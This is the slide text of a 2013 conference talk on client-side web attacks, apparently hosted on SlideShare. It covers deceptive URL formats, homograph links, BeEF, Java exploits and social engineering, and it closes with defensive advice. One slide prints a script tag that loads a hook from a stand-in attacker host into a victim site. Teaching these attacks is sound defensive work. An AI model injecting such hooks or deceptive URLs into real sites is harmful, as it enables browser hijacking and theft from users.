Welcome to the world of hacking

3,085 views
2,698 views

Published on

This presentation was prepared specially for IT Weekend Lviv, October 2013 and cover Client Side Attacks against web users.

Published in: Technology, Design
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,085
On SlideShare
0
From Embeds
0
Number of Embeds
801
Actions
Shares
0
Downloads
20
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide
  • http://www.pcworld.com/article/2030086/cybercriminals-using-digitally-signed-java-exploits-to-trick-users.html
  • Zitmo and Zeus bank trojan
  • Welcome to the world of hacking

    1. 1. Welcome to the world of HACKING by Nazar Tymoshyk, R&D team, SoftServe & Bohdan Serednyskyj, R&D team,
    2. 2. What this topic is about?
    3. 3. Як це бачать друзі Що думає мама Як це бачить влада Як уявляю собі це я Як сприймає суспільство А що є насправді
    4. 4. This is more educational topic, not motivational
    5. 5. Amateurs hacks - systems, Professionals hacks PEOPLE Client Side Attacks
    6. 6. About me
    7. 7. Feel free to ask me anything :)
    8. 8. Best SoftServe Team – R&D
    9. 9. Security Team Nazar Tymoshyk CEH, HP FSTS, CIW WSS, Cisco SS, ZSS, CLE, DCTS, DCATS,NAI,CLP,NLTS, CNA,NCLA,MCTS Bohdan Serednytsk yi CEH, MSTC Security, ZSS
    10. 10. Certifications Identity & Security Ph.D in Security SoftServe experts are certified in HP Fortify Security Testing solution
    11. 11. Time for fun. Just relax
    12. 12. Target – web users
    13. 13. Everybody knows that Government is spying us
    14. 14. Every day we are getting suspicious emails
    15. 15. And online promotions Yes!!! Just click link belo
    16. 16. Quick Quiz 1. Will this URL work in IE? http:example.com 2. What page will be opened in Firefox browser after entering this URL? http://example.com@coredump.cx/ Answers 1. Yes. IE and most browsers parse “” as “/” for usability reasons. 2. In Firefox, that URL will take the user to coredump.cx, because example.com will be interpreted as a valid value for the login field. In almost all other browsers, “” will be interpreted as a path delimiter, and the user will land on example.com instead.
    17. 17. Now try it by yourself and answer what you get?!
    18. 18. Tricky URLs For all browsers http://example.com&gibberish=1234@16777216 1/ And http://example.com@coredump.cx/ is http://example.com/ for all…
    19. 19. This is it! For all browsers http://example.com&gibberish=1234@16777216 1/ is http://10.0.0.1/ And http://example.com@coredump.cx/ is http://example.com/ for all… …but for Firefox it’s http://coredump.cx/
    20. 20. Cheaters http://example.com/.wholesomedomain.com/ This only looks like a real Slash. Read: Evgeniy Gabrilovich and Alex Gontmakher “The Homograph Attack”
    21. 21. Server addresses • http://127.0.0.1/ This is a canonical representation of an IPv4 address. • http://0x7f.1/ This is a representation of the same address that uses a hexadecimal number to represent the first octet and concatenates all the remaining octets into a single decimal value. • http://017700000001/ The same address is denoted using a 0-prefixed octal value, with all octets concatenated into a single
    22. 22. Now attention
    23. 23. Recommended Book
    24. 24. DEMO I
    25. 25. BeeF – Browser exploitation framework
    26. 26. Our victim site http://192.168.241.240:8882 <script src=http://attackersite/hook.js></script>
    27. 27. Now about Java
    28. 28. Everybody likes Java
    29. 29. But there is a small problem in 2013
    30. 30. Java exploits in Metasploit 4 Status - Excelle
    31. 31. JVM vulnerabilities
    32. 32. DEMO II
    33. 33. Social Engineering TOolkit
    34. 34. Consequences • Stolen Developer Cloud access Certificates • Malware and Spyware on PC and mobile • Key loggers • Money Lost – Paypal, webmoney, etc. • Email – recovery and steal accounts • SHAME!
    35. 35. Recommendations • Up to date JAVA and all other software • Antivirus – Kasper rocks! • Encrypted keys to infrastructure • 2 factor authentication everywhere (email first) • Verify yourself and your browser on … • Attention
    36. 36. OWASP Secure Coding Guide
    37. 37. Apache Shiro
    38. 38. OWASP WebGoat, DVWA Train yourself in Security
    39. 39. Hope you like it!
    40. 40. Now ask! Email: root.nt@gmail.com Skype: root_nt Thank You! Copyright © 2013 SoftServe, Inc.

    ×